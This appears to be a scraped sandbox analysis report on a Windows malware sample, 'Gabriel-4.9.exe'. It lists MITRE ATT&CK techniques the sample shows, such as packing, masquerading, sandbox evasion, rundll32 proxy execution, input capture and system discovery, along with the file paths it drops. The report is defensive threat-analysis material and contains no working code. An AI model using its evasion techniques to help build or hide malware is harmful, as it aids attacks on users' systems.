Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Gabriel-4.9.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files\product1\letsvpn-latest.exe

C:\ProgramData\Microsoft\MicrosoftNetFramework.xml

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Program\ziliao.jpg

C:\ProgramData\Program\iusb3mon.exe

C:\ProgramData\mntemp

C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe

Windows Analysis Report
Gabriel-4.9.exe

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.
Tactics:	Defense Evasion
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Firewall: Firewall Rule Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, Scheduled Job: Scheduled Job Modification, User Account: User Account Authentication, User Account: User Account Deletion, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, Google Workspace, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre